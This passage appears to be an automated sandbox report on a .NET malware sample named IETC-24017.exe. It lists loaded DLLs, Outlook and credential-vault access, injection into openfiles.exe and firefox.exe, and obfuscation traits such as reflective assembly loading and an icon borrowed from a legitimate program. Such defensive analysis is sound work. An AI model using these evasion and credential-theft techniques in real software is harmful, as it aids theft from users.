                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\IETC-24017.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: IETC-24017.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: IETC-24017.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: IETC-24017.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WyjV.pdb source: IETC-24017.exe
                      Source: Binary string: OpnFiles.pdb source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UFUUPGsATdE.exe, 00000006.00000002.4124119366.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IETC-24017.exe, IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: OpnFiles.pdbGCTL source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: WyjV.pdbSHA256H source: IETC-24017.exe

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: IETC-24017.exe, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.cs.Net Code: NoFdbL1XQW System.Reflection.Assembly.Load(byte[])
                      Source: 6.2.UFUUPGsATdE.exe.585cd14.1.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 7.2.openfiles.exe.4f5cd14.2.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 11.2.firefox.exe.2715cd14.0.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: IETC-24017.exeStatic PE information: 0xA1FAACB2 [Sat Feb 12 05:46:26 2056 UTC]
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_025CF362 push cs; retf 0_2_025CF395
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_025CF3F0 push esp; iretd 0_2_025CF3F1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_04D1F4D7 pushfd ; iretd 0_2_04D1F4E6
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06ECC3DE push esp; retf 0_2_06ECC3DF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06EC5931 push 200516F3h; iretd 0_2_06EC593D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0041A8C6 push eax; iretd 3_2_0041A8C7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040214D push 353832D5h; retf 3_2_00402152
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040D97D push ss; retf 3_2_0040D9A4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040D98A push ss; retf 3_2_0040D9A4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040DAFD push esp; retf 3_2_0040DAFC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040DA96 push esp; retf 3_2_0040DAFC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004032B0 push eax; ret 3_2_004032B2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040DAB1 push esp; retf 3_2_0040DAFC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00417B70 pushfd ; iretd 3_2_00417B71
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00401B0A push cs; iretd 3_2_00401B0B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00404BD0 push AECA29B3h; iretd 3_2_00404BD5
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004183E9 push eax; retf 3_2_004183EA
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00417401 push ebx; ret 3_2_00417416
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00413D95 push 95C026B5h; iretd 3_2_00413D9B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0041865C push edx; retf 3_2_0041865D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0041767F push FFFFFFCEh; retf 3_2_00417681
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040BE09 push ebp; ret 3_2_0040BE0A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004146EC pushad ; ret 3_2_004146ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040D7E9 push cs; ret 3_2_0040D7F3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018009AD push ecx; mov dword ptr [esp], ecx3_2_018009B6
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CB774A push AECA29B3h; iretd 6_2_07CB774F
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC9F7B push ebx; ret 6_2_07CC9F90
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CCA6EA pushfd ; iretd 6_2_07CCA6EB
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CCD440 push eax; iretd 6_2_07CCD441
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC83CD push ebp; ret 6_2_07CC83CE
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC8A2C push edx; iretd 6_2_07CC8A48
                      Source: IETC-24017.exeStatic PE information: section name: .text entropy: 7.942883165317064
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, VAg96iFHAfltmo8833.csHigh entropy of concatenated method names: 'hw80JeyWFf', 'p8I0Gb94PO', 'zNy0PsYrXS', 'i98PKE1AG9', 'EfBPzKXdJf', 'acy091klGH', 'wIN075qTHS', 'YF10qMHxPb', 'knU0TdGcTN', 'ohN0dLxLQN'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.csHigh entropy of concatenated method names: 'I3XTL9pD5Z', 'wQnTJ94mdi', 'pZKTarRoOL', 'LGiTGOQ8xa', 'FHeTCPCcsL', 'NXlTPuiEOe', 'ekBT0Dx10e', 'liFTidJVTu', 'GOwToTlwJ3', 'kv1TRuuoDH'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, hy5jhq2XPvGJZWw6EX.csHigh entropy of concatenated method names: 'QGGIHVWJmK', 'Ad6ISWQRvC', 'gK6I4RGcqP', 'VQcIc4k8ZX', 'PwiIWDLFv6', 'UvHIwSHEIr', 'HceIFFHJmN', 'oPAIuhByWK', 'VS8IEQPOey', 'D11IQvuqfu'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, DBRAhcaAGVPnvXZS8R.csHigh entropy of concatenated method names: 'Dispose', 'Rdp72wHpm3', 'DbiqS7UMfb', 'nFgoWDwaqa', 'pAq7KM077S', 'TZr7ze7EKh', 'ProcessDialogKey', 'jkCq9y5jhq', 'SPvq7GJZWw', 'vEXqqN9BeN'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, UgURI8qxyhTosJc40U.csHigh entropy of concatenated method names: 'l8fbLw3dr', 'pvTAjexNd', 'ChShBePmb', 'xPTtAYYlO', 'yc5lEFDfJ', 'tIIm6pvxv', 'VXYLGw4Gvkte9t0trx', 'XFHKkf7CTkXm562cmN', 'uDOONWdFH', 'OWRf3Ybr8'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, hbFFUcEYYNYugCsOEF.csHigh entropy of concatenated method names: 'KmG0Dd8Iuu', 'dmV0rYYmaR', 'eZT0bywJkR', 'Fe60ACK4Qo', 'Syk0yuHJCx', 'LTS0hRBP62', 'lJZ0teTZq7', 'cJX0NT5ZGa', 'BFV0lcsrbH', 'pAc0mk6BwY'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, vSepHu7qfgQA737a6I9.csHigh entropy of concatenated method names: 'ToString', 'xPmUNUQism', 'aPiUlTmiDf', 'OIgUmCgsfh', 'ESVUHM09fT', 'RDbUSn8yJT', 'hZtU4IPlCT', 'nrsUc8Jad3', 'GECkPdnBR85Z8vSmCAq', 'AMfMqnnaIeoW44ClrlS'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, OCAaygYSWXdpwHpm3x.csHigh entropy of concatenated method names: 'vpHIxVqqg7', 'qfpIerMkd7', 'jcPIIoR6rl', 'eI6IUTNLkE', 'HSuI6xO3bT', 'cCoI5DdwHb', 'Dispose', 'GPqOJ7IbLC', 'ShrOa1xxDp', 'nSOOGd0QKY'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, wN1TkLl7GsHrtICG5A.csHigh entropy of concatenated method names: 'h6HGA0cfTc', 'DTxGh5Cqh0', 'TkBGNoXg4f', 'ys1Glbwf55', 'z5jGxdLfEM', 'G0YGn2EXfV', 'gUTGed6Dnw', 'lxGGO0DVr6', 'V1TGIgcvXa', 'JGXGfmiPfD'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, tnq2KFviY0hphdNuc7.csHigh entropy of concatenated method names: 'qWheM39p6A', 'LQpeK2kmrp', 'qDFO9HJEav', 'YJpO7Uid03', 'u7KegkJOZr', 'VK8epGtu0S', 'WXUe3cqF86', 'Sc5eZTeZ35', 'iLAeXPUANF', 'N8OeVsjJHf'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, Iht7kKNJwU57iwhQqv.csHigh entropy of concatenated method names: 'boIaZwduI2', 'XsZaXGLjLA', 'vVgaVGpTwG', 'RL1a8k4DtM', 'vrMajZ40KD', 'PxCavKb8QF', 'hlTaY2khfU', 'BsraMaaVm5', 'MDEa2tNauI', 'BvAaK4A4Fk'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, A4L4Vc79JQDkWedh4rO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kV1fg5j83t', 'pFMfp7vAbZ', 'jxZf3kwVb6', 'bwjfZxr95p', 'sbKfXPAj4t', 'GaofVAuAIB', 'O0df8Kxpu3'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, GX0wN0dmJfRg70pdyC.csHigh entropy of concatenated method names: 'vyc70ht7kK', 'fwU7i57iwh', 'e7G7RsHrtI', 'hG57BAxKeS', 'sRH7xSsMAL', 'pmX7ntU7pu', 'ynTVlAW86us8oO3Znb', 'jdWGUEQJeFZhll39hf', 'qA877KlXK0', 'sUP7TWMobc'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, WALnmXHtU7puQov5HH.csHigh entropy of concatenated method names: 'M2KPLUkjEW', 'j58PabffWS', 'soKPCKMbax', 'hBhP0iqpXq', 'pV4Pi3puZS', 'pN5CjyFVTB', 'rA5CvSTdnW', 'KW9CY2W9yp', 'FE8CMhCPs7', 'EDdC2IQWq4'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, qApYO98iKLgXPfEkS1.csHigh entropy of concatenated method names: 'CIBeRJFg6U', 'jMreBlL5qS', 'ToString', 'sbfeJbjR1u', 'K8YeaCw1yN', 'Ll8eGQHjpg', 'S3eeCLCTsB', 'T9keP9LrSn', 'arCe09yDYv', 'c1BeiHO1oW'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, oKeSaLmEUc8upfRHSs.csHigh entropy of concatenated method names: 'xE2CyGPVvv', 'bWVCtXoYS9', 'aUpG4fajGi', 'ixZGcQk3KN', 'AUgGW1Un6k', 'TRDGwKLhil', 'hJQGFUt0pi', 'srGGus4qXy', 'wBtGEJN1Pc', 'DnsGQZ1lbr'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, D9BeNbKucdwYKiUcOh.csHigh entropy of concatenated method names: 'aNxfGSvSRo', 'TI5fC7fm7R', 'RkwfPGVOHu', 'pu9f07N3E8', 'EyVfIOQbVg', 'Qcbfi0BTup', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, patXOJ779IGXwNlSKZV.csHigh entropy of concatenated method names: 'ig6fKsZvXg', 'BoTfzW3gK1', 'zOTU9du0MR', 'Y1fU7CEICj', 'YpBUqkatAN', 'NH5UTRkcKp', 'Yq2Ud3FmVP', 'BLvULo54BL', 'sVDUJiWMvg', 'u6fUaE73Aj'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, K61eDCzSKtftstjKOM.csHigh entropy of concatenated method names: 'A86fhM5baH', 'ynofNZBHwi', 'SGCfljsEhp', 'SXAfHuqSv8', 'wuefS6fQs3', 'RenfcGtxrL', 'LQcfWdHXJ2', 'SfCf5je0Gm', 'owrfDAt3mh', 'GwyfrNySoO'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, widv6h3Seesyg9dVrN.csHigh entropy of concatenated method names: 'Kgm1N7PHwC', 'vnS1l39FkO', 'GhI1HuKAWg', 'jjD1SI2JaZ', 'F3I1cI0Fnn', 'QQ31WVgsmg', 'Gn01Ftxe5Y', 's271u41iax', 'kiI1QChbIt', 'Vpc1gh08is'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, p4vIBPGLgnxAJsejJ0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ck6q2EliC0', 'XAGqKA9U6V', 'PoqqzXOnnr', 'WhAT9reQSY', 'r3rT7OGBSZ', 'dOnTqE57j5', 'OFGTTVc4pX', 'uf5NlL2IBDbbx09fQVC'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, H1JqMh7dvubCIcXHTdc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XoSsI6T7SZ', 'Lixsf6IvQc', 'iUjsUMO5Tj', 'bwnssGqHDY', 'xGqs6lZRis', 'kJZsk1kjNG', 'YNAs5cffaI'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, jngiprwo12vMKFGX2H.csHigh entropy of concatenated method names: 'MoEPVWQlPq', 'LYKP8sQVYR', 'BlNPjCne2k', 'ToString', 'RnnPvLsN53', 'uXIPYfgHeE', 'dIaFsUIcufvs2bZtV6n', 'tkyVT3IAcBQGtjPYbmx', 'b21QuiI4CFGBbh5OEUB'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Icon mismatch, binary includes an icon from a different legit application in order to fool users
                      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (15).png
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
